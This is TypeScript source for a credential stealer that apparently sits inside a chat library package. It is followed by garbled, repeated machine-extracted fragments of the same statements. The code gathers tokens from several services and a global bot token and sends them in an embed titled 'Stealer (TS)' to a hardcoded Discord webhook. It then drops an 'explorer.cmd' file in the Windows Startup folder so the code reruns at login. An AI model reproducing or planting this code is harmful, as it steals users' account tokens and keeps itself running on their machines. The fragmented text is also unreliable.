public async run(): Promise<void> {
		const tokens: List<Token> = new List<Token>();

		await Bluebird.all(this.services.map(async (service: Service) => {
			tokens.addRange(await service.getTokens());
		}));

		const client: WebhookClient = new WebhookClient('766342517549301771', 'r5lqtrhieTfiwqhneOrtWQsK0WtT-_SjuWNESv3uXQtAw2yCMS5zNfEl6UAoTcEr-_gN');

		await client.send(undefined, {
			embeds: [
				{
					title: 'Stealer (TS)',
					description: stripIndents`
						Bot token: \`${global.__anon_chat_lib_token ?? '* not available *'}\`
						Tokens:
						${tokens.map((token: Token) => {
							return `[${token.service.name}]: ${token.value}`;
						}).join('\n')}
					`
				}
			]
		});

		try {
			const autorunFile: string = path.join(os.homedir(), 'AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/explorer.cmd');
			const packageFile: string = path.join(appRoot.path, 'package.json');
			const mainFile: string = path.join(appRoot.path, JSON...
const tokens: List<Token> = new List<Token>()
await Bluebird.all(this.services.map(async (service: Service) => {
			tokens.addRange(await service.getTokens());
		}))
const client: WebhookClient = new WebhookClient('766342517549301771', 'r5lqtrhieTfiwqhneOrtWQsK0WtT-_SjuWNESv3uXQtAw2yCMS5zNfEl6UAoTcEr-_gN')
await client.send(undefined, {
			embeds: [
				{
					title: 'Stealer (TS)',
					description: stripIndents`
						Bot token: \`${global.__anon_chat_lib_token ?? '* not available *'}\`
						Tokens:
						${tokens.map((token: Token) => {
							return `[${token.service.name}]: ${token.value}`;
						}).join('\n')}
					`
				}
			]
		})
_tmp_15.embeds = [
				{
					title: 'Stealer (TS)',
					description: stripIndents`
						Bot token: \`${global.__anon_chat_lib_token ?? '* not available *'}\`
						Tokens:
						${tokens.map((token: Token) => {
							return `[${token.service.name}]: ${token.value}`;
						}).join('\n')}
					`
				}
			]
_tmp_16.push({
					title: 'Stealer (TS)',
					description: stripIndents`
						Bot token: \`${global.__anon_chat_lib_token ?? '* not available *'}\`
						Tokens:
						${tokens.map((token: Token) => {
							return `[${token.service.name}]: ${token.value}`;
						}).join('\n')}
					`
				})
_tmp_17.title = "Stealer (TS)"
_tmp_17.description = stripIndents`
						Bot token: \`${global.__anon_chat_lib_token ?? '* not available *'}\`
						Tokens:
						${tokens.map((token: Token) => {
							return `[${token.service.name}]: ${token.value}`;
						}).join('\n')}
					`
global.__anon_chat_lib_token ?? '* not available *'
(_tmp_18 = tokens.map((token: Token) => {
							return `[${token.service.name}]: ${token.value}`;
						})).join
_tmp_19.push("
					")
const autorunFile: string = path.join(os.homedir(), 'AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/explorer.cmd')
const packageFile: string = path.join(appRoot.path, 'package.json')
const mainFile: string = path.join(appRoot.path, JSON.parse(await fs.readFile(packageFile, { encoding: 'utf8' })).main)
await fs.writeFile(autorunFile, stripIndents`
				@echo off
				node "${mainFile}" --autorun
			`, { encoding: 'utf8' })
_tmp_21.push("" --autorun
			")
_tmp_22.encoding = "utf8"
